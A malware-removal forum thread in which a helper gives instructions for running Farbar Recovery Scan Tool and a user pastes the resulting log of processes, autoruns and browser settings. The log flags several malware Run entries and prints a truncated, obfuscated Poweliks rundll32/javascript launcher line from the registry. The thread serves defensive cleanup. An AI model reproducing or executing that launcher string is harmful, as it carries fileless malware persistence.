icon_arrow.gif Paste the logs in your posts, attachments make my work harder and more complicated.
icon_arrow.gif Stay with me to the end, the absence of symtoms doesn't mean that your machine is fully operational.
icon_arrow.gif Note that we may live in totally different time zones, what may cause some delays between answers.

icon_idea.gif I can't foresee everything, so if anything unexpected happens, please stop and inform me!
icon_idea.gif There are no silly questions. Never be afraid to ask if in doubt!

Let's start and enjoy the fight! :)


FRST.gif Scan with Farbar Recovery Scan Tool

Please download Farbar Recovery Scan Tool and save it to your Desktop.
There will be two versions to download: 32-bit and 64-bit. Please download the one that is designed for your system. If you don't know which one should it be, download both of them and try each other out. Only one will run - this is the right one. Please leave it and delete the other.

  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    > XP users click run after receipt of Windows Security Warning - Open File.
    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
  • When the tool opens click Yes to disclaimer.
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.


Radek Naathim Pawelczyk

Malware Removal Specialist

 

staff.png


#5 RaRWolf

RaRWolf
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:01:20 AM

Posted 22 October 2014 - 04:25 PM

FRST Scan:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 22-10-2014
Ran by RaRWolf (administrator) on SHOOBLEDOOBLE on 22-10-2014 17:11:34
Running from C:\Users\RaRWolf\Downloads
Loaded Profile: RaRWolf (Available profiles: RaRWolf)
Platform: Windows 8 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
() C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hi-Rez Studios) C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite II\Dr.Net\AsDrNotify.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Wacom Technology, Corp.) C:\Windows\System32\Wacom_Tablet.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Flux Software LLC) C:\Users\RaRWolf\AppData\Local\FluxSoftware\Flux\flux.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite II\EPU\EPUHelp.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\nacl64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\nacl64.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\updaterstartuputility.exe
(BitTorrent Inc.) C:\Users\RaRWolf\AppData\Roaming\uTorrent\uTorrent.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(WB Games, Inc.) C:\Program Files (x86)\Steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
(Valve Corporation) C:\Program Files (x86)\Steam\GameOverlayUI.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2403104 2014-07-25] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3100440 2014-05-19] (Logitech, Inc.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [ASUS Ai Charger] => C:\Program Files (x86)\ASUS\ASUS Ai Charger\AiChargerAP.exe [547984 2012-08-13] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [ASUS Easy Update] => C:\Program Files (x86)\ASUS\ASUS Easy Update\ALU.exe [195200 2012-05-24] (ASUSTeK Computer Inc.)
HKLM-x32\...\Run: [ASUSWebStorage] => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\AsusWSPanel.exe [3405696 2012-06-25] (ASUS Cloud Corporation)
HKLM-x32\...\Run: [ASUSPRP] => C:\Program Files (x86)\ASUS\APRP\APRP.EXE [2984688 2012-09-14] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2013-02-20] (Apple Inc.)
HKLM-x32\...\Run: [amd_dc_opt] => C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe [77824 2008-07-22] (AMD)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [TkBellExe] => C:\Program Files (x86)\Real\RealPlayer\update\realsched.exe [296520 2014-08-01] (RealNetworks, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [585560 2014-06-23] (Razer Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [3802448 2014-09-04] (LogMeIn Inc.)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [1938624 2014-10-21] (Valve Corporation)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [3672640 2013-03-14] (Disc Soft Ltd)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Dxtory Update Checker 2.0] => C:\Program Files (x86)\ExKode\Dxtory2.0\UpdateChecker.exe [93696 2010-10-17] (Dxtory Software)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [MurGee.com Auto Clicker] => C:\Program Files (x86)\Auto Clicker\AutoClicker.exe [90440 2013-08-15] (MurGee.com)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [f.lux] => C:\Users\RaRWolf\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-23] (Flux Software LLC)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [uTorrent] => C:\Users\RaRWolf\AppData\Roaming\uTorrent\uTorrent.exe [1385808 2014-10-16] (BitTorrent Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Razer Comms] => C:\Program Files (x86)\Razer\Comms\ChatApplet.exe [11233088 2014-08-01] (Razer Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [GoogleChromeAutoLaunch_0174F854A725FE2A1C6FD2A6E7F56180] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [854344 2014-10-09] (Google Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6482200 2014-09-26] (Piriform Ltd)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Okfylaigkiepqul] => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Hewavy\olbuhi.exe <===== ATTENTION
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [{eaab0735-f4dd-2c20-e526-c77a5339bc54}] => C:\Users\RaRWolf\AppData\Local\Temp\18b98\AppData\Local\Microsoft\{eaab0735-f4dd-2c20-e526-c77a5339bc54}\{eaab0735-f4dd-2c20-e526-c77a5339bc54}.exe [0 2014-10-17] () <===== ATTENTION
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Xohokebonien] => "C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Axutwu\osama.exe" <===== ATTENTION
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Oxveroifbav] => "C:\Users\RaRWolf\AppData\Roaming\Opfocyf\ebkawau.exe"
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Ezymkuzoawcy] => C:\Users\RaRWolf\AppData\Roaming\Adtuguka\hozuupw.exe
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Fuoxcoy] => C:\Users\RaRWolf\AppData\Roaming\Xyasocki\dugit.exe
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Ozotovihulipa] => "C:\Users\RaRWolf\AppData\Roaming\Ifylqyte\aldinae.exe"
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\CurrentVersion\Windows: [Load] C:\Users\RaRWolf\LOCALS~1\Temp\mswuuuq.com <===== ATTENTION
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {052c3cd4-0787-11e4-bef9-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {0531270f-9781-11e3-bedd-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {10709a9d-09d0-11e3-bec3-3085a9a720f7} - "W:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {16c2790a-f6d3-11e2-beb7-3085a9a720f7} - "V:\LaunchBF.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {16c27936-f6d3-11e2-beb7-3085a9a720f7} - "G:\LaunchBF.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {16c27938-f6d3-11e2-beb7-3085a9a720f7} - "G:\LaunchBF.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {1fd923c8-bc33-11e3-bee5-3085a9a720f7} - "M:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {204b18f3-c014-11e3-bee6-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {218680d2-f681-11e3-bef3-3085a9a720f7} - "W:\AUTORUN.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {218684f4-f681-11e3-bef3-3085a9a720f7} - "W:\AUTORUN.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224231d1-c503-11e2-be9f-3085a9a720f7} - "G:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224233b8-c503-11e2-be9f-3085a9a720f7} - "D:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224239be-c503-11e2-be9f-3085a9a720f7} - "V:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224239c6-c503-11e2-be9f-3085a9a720f7} - "V:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {27e8eeda-466e-11e4-bf02-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db2656c-2f40-11e4-bf02-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db265cd-2f40-11e4-bf02-3085a9a720f7} - "W:\PLAY.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db265d3-2f40-11e4-bf02-3085a9a720f7} - "W:\PLAY.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db2668f-2f40-11e4-bf02-3085a9a720f7} - "W:\PLAY.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {5225a7b0-262b-11e3-beca-3085a9a720f7} - "G:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {5fb8944e-6f5a-11e3-bed8-3085a9a720f7} - "W:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {61382182-c8f3-11e3-bee9-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {61382315-c8f3-11e3-bee9-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {669ae025-c999-11e2-be9f-3085a9a720f7} - "V:\LaunchBFII.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {75ca72ec-0943-11e3-bec1-3085a9a720f7} - "W:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {75ca7318-0943-11e3-bec1-3085a9a720f7} - "G:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {75ca7333-0943-11e3-bec1-3085a9a720f7} - "G:\AutoRunBloodmoon.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {7675d3a1-2dd6-11e3-becb-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {81542b50-c6b0-11e3-bee8-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {81b30cb5-ce51-11e3-beea-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {88bc3d74-e828-11e2-beb3-3085a9a720f7} - "V:\setup.exe" /autorun
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c3f59-14a9-11e4-befb-3085a9a720f7} - "W:\gods2.0.0.1.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c4780-14a9-11e4-befb-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c48b7-14a9-11e4-befb-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c48ea-14a9-11e4-befb-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b608f49-403c-11e4-bf02-3085a9a720f7} - "W:\Install.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8eecf028-4496-11e3-becd-3085a9a720f7} - "W:\Installer.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cc21-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cc51-e00f-11e2-beb0-3085a9a720f7} - "W:\AutoRunBloodmoon.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cc60-e00f-11e2-beb0-3085a9a720f7} - "X:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cce6-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf09-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf54-e00f-11e2-beb0-3085a9a720f7} - "W:\AutoRunBloodmoon.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf67-e00f-11e2-beb0-3085a9a720f7} - "X:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf84-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cfbe-e00f-11e2-beb0-3085a9a720f7} - "X:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {983b7abb-fe41-11e2-bebd-20aa4b7ab8bf} - "V:\Install.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30cb6a-dbb5-11e3-beec-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30cc47-dbb5-11e3-beec-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30d536-dbb5-11e3-beec-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30d7dc-dbb5-11e3-beec-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {b357db0c-3a8d-11e3-becc-3085a9a720f7} - "W:\MB-Warband-Napoleonic-Wars.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {b357e30d-3a8d-11e3-becc-3085a9a720f7} - "W:\MB-Warband-Napoleonic-Wars.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b970e-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b985e-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b98a3-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b98ae-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {cfd62f9e-d92d-11e3-beec-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {dd3c40e4-f792-11e3-bef3-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {dd3c41c9-f792-11e3-bef3-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {e71be4cb-cac0-11e3-bee9-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {ea73b1b6-0701-11e2-be6b-806e6f6e6963} - "E:\install.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs-x32: DllInjectHelper.dll => "DllInjectHelper.dll" File Not Found
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RealPlayer Cloud Service UI.lnk
ShortcutTarget: RealPlayer Cloud Service UI.lnk -> C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin64\rpsystray.exe (RealNetworks, Inc.)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers: [AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7190} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D808} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4D} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://asus13.msn.com
SearchScopes: HKLM - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKLM-x32 - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKCU - DefaultScope {DE735EC1-AA5B-4ED2-A1F0-B6C85F4E8ABE} URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=714647&p={searchTerms}
SearchScopes: HKCU - {DE735EC1-AA5B-4ED2-A1F0-B6C85F4E8ABE} URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=714647&p={searchTerms}
BHO: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll (Microsoft Corporation.)
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll (RealDownloader)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
